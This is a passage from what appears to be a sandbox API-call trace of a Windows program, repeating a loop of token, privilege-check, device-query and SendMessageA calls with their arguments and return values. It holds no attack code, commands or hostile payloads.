pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.049] GetLastError () returned 0x578 [0017.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.049] GetCurrentThread () returned 0xfffffffe [0017.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.049] GetLastError () returned 0x3f0 [0017.049] GetCurrentProcess () returned 0xffffffff [0017.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.049] SetLastError (dwErrCode=0x522) [0017.049] CloseHandle (hObject=0x114) returned 1 [0017.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.049] GetLastError () returned 0x578 [0017.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.049] GetCurrentThread () returned 0xfffffffe [0017.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.049] GetLastError () returned 0x3f0 [0017.049] GetCurrentProcess () returned 0xffffffff [0017.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.049] SetLastError (dwErrCode=0x522) [0017.049] CloseHandle (hObject=0x114) returned 1 [0017.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.049] GetLastError () returned 0x578 [0017.049] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.049] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.049] GetCurrentThread () returned 0xfffffffe [0017.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.049] GetLastError () returned 0x3f0 [0017.049] GetCurrentProcess () returned 0xffffffff [0017.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.050] SetLastError (dwErrCode=0x522) [0017.050] CloseHandle (hObject=0x114) returned 1 [0017.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.050] GetLastError () returned 0x578 [0017.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.050] GetCurrentThread () returned 0xfffffffe [0017.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.050] GetLastError () returned 0x3f0 [0017.050] GetCurrentProcess () returned 0xffffffff [0017.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.050] SetLastError (dwErrCode=0x522) [0017.050] CloseHandle (hObject=0x114) returned 1 [0017.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.050] GetLastError () returned 0x578 [0017.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.050] GetCurrentThread () returned 0xfffffffe [0017.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.050] GetLastError () returned 0x3f0 [0017.050] GetCurrentProcess () returned 0xffffffff [0017.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.050] SetLastError (dwErrCode=0x522) [0017.050] CloseHandle (hObject=0x114) returned 1 [0017.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.050] GetLastError () returned 0x578 [0017.050] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.050] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.050] GetCurrentThread () returned 0xfffffffe [0017.050] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.050] GetLastError () returned 0x3f0 [0017.050] GetCurrentProcess () returned 0xffffffff [0017.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.050] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.050] SetLastError (dwErrCode=0x522) [0017.050] CloseHandle (hObject=0x114) returned 1 [0017.050] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.050] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.051] GetLastError () returned 0x578 [0017.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.051] GetCurrentThread () returned 0xfffffffe [0017.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.051] GetLastError () returned 0x3f0 [0017.051] GetCurrentProcess () returned 0xffffffff [0017.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.051] SetLastError (dwErrCode=0x522) [0017.051] CloseHandle (hObject=0x114) returned 1 [0017.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.051] GetLastError () returned 0x578 [0017.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.051] GetCurrentThread () returned 0xfffffffe [0017.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.051] GetLastError () returned 0x3f0 [0017.051] GetCurrentProcess () returned 0xffffffff [0017.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.051] SetLastError (dwErrCode=0x522) [0017.051] CloseHandle (hObject=0x114) returned 1 [0017.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.051] GetLastError () returned 0x578 [0017.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.051] GetCurrentThread () returned 0xfffffffe [0017.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.051] GetLastError () returned 0x3f0 [0017.051] GetCurrentProcess () returned 0xffffffff [0017.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.051] SetLastError (dwErrCode=0x522) [0017.051] CloseHandle (hObject=0x114) returned 1 [0017.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.051] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.051] GetLastError () returned 0x578 [0017.051] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.051] GetCurrentThread () returned 0xfffffffe [0017.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.052] GetLastError () returned 0x3f0 [0017.052] GetCurrentProcess () returned 0xffffffff [0017.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.052] SetLastError (dwErrCode=0x522) [0017.052] CloseHandle (hObject=0x114) returned 1 [0017.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.052] GetLastError () returned 0x578 [0017.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.052] GetCurrentThread () returned 0xfffffffe [0017.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.052] GetLastError () returned 0x3f0 [0017.052] GetCurrentProcess () returned 0xffffffff [0017.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.052] SetLastError (dwErrCode=0x522) [0017.052] CloseHandle (hObject=0x114) returned 1 [0017.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.052] GetLastError () returned 0x578 [0017.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.052] GetCurrentThread () returned 0xfffffffe [0017.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.052] GetLastError () returned 0x3f0 [0017.052] GetCurrentProcess () returned 0xffffffff [0017.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.052] SetLastError (dwErrCode=0x522) [0017.052] CloseHandle (hObject=0x114) returned 1 [0017.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.052] GetLastError () returned 0x578 [0017.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.052] GetCurrentThread () returned 0xfffffffe [0017.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.052] GetLastError () returned 0x3f0 [0017.052] GetCurrentProcess () returned 0xffffffff [0017.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.052] SetLastError (dwErrCode=0x522) [0017.053] CloseHandle (hObject=0x114) returned 1 [0017.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.053] GetLastError () returned 0x578 [0017.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.053] GetCurrentThread () returned 0xfffffffe [0017.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.053] GetLastError () returned 0x3f0 [0017.053] GetCurrentProcess () returned 0xffffffff [0017.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.053] SetLastError (dwErrCode=0x522) [0017.053] CloseHandle (hObject=0x114) returned 1 [0017.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.053] GetLastError () returned 0x578 [0017.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.053] GetCurrentThread () returned 0xfffffffe [0017.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.053] GetLastError () returned 0x3f0 [0017.053] GetCurrentProcess () returned 0xffffffff [0017.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.053] SetLastError (dwErrCode=0x522) [0017.053] CloseHandle (hObject=0x114) returned 1 [0017.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.053] GetLastError () returned 0x578 [0017.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.053] GetCurrentThread () returned 0xfffffffe [0017.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.053] GetLastError () returned 0x3f0 [0017.053] GetCurrentProcess () returned 0xffffffff [0017.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.053] SetLastError (dwErrCode=0x522) [0017.053] CloseHandle (hObject=0x114) returned 1 [0017.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.053] GetLastError () returned 0x578 [0017.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.054] GetCurrentThread () returned 0xfffffffe [0017.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.054] GetLastError () returned 0x3f0 [0017.054] GetCurrentProcess () returned 0xffffffff [0017.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.054] SetLastError (dwErrCode=0x522) [0017.054] CloseHandle (hObject=0x114) returned 1 [0017.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.054] GetLastError () returned 0x578 [0017.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.054] GetCurrentThread () returned 0xfffffffe [0017.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.054] GetLastError () returned 0x3f0 [0017.054] GetCurrentProcess () returned 0xffffffff [0017.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.054] SetLastError (dwErrCode=0x522) [0017.054] CloseHandle (hObject=0x114) returned 1 [0017.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.054] GetLastError () returned 0x578 [0017.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.054] GetCurrentThread () returned 0xfffffffe [0017.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.054] GetLastError () returned 0x3f0 [0017.054] GetCurrentProcess () returned 0xffffffff [0017.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.054] SetLastError (dwErrCode=0x522) [0017.054] CloseHandle (hObject=0x114) returned 1 [0017.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.054] GetLastError () returned 0x578 [0017.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.054] GetCurrentThread () returned 0xfffffffe [0017.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.054] GetLastError () returned 0x3f0 [0017.054] GetCurrentProcess () returned 0xffffffff [0017.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.055] SetLastError (dwErrCode=0x522) [0017.055] CloseHandle (hObject=0x114) returned 1 [0017.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.055] GetLastError () returned 0x578 [0017.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.055] GetCurrentThread () returned 0xfffffffe [0017.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.055] GetLastError () returned 0x3f0 [0017.055] GetCurrentProcess () returned 0xffffffff [0017.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.055] SetLastError (dwErrCode=0x522) [0017.055] CloseHandle (hObject=0x114) returned 1 [0017.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.055] GetLastError () returned 0x578 [0017.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.055] GetCurrentThread () returned 0xfffffffe [0017.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.055] GetLastError () returned 0x3f0 [0017.055] GetCurrentProcess () returned 0xffffffff [0017.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.055] SetLastError (dwErrCode=0x522) [0017.055] CloseHandle (hObject=0x114) returned 1 [0017.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.055] CM_Get_Device_Interface_List_SizeA 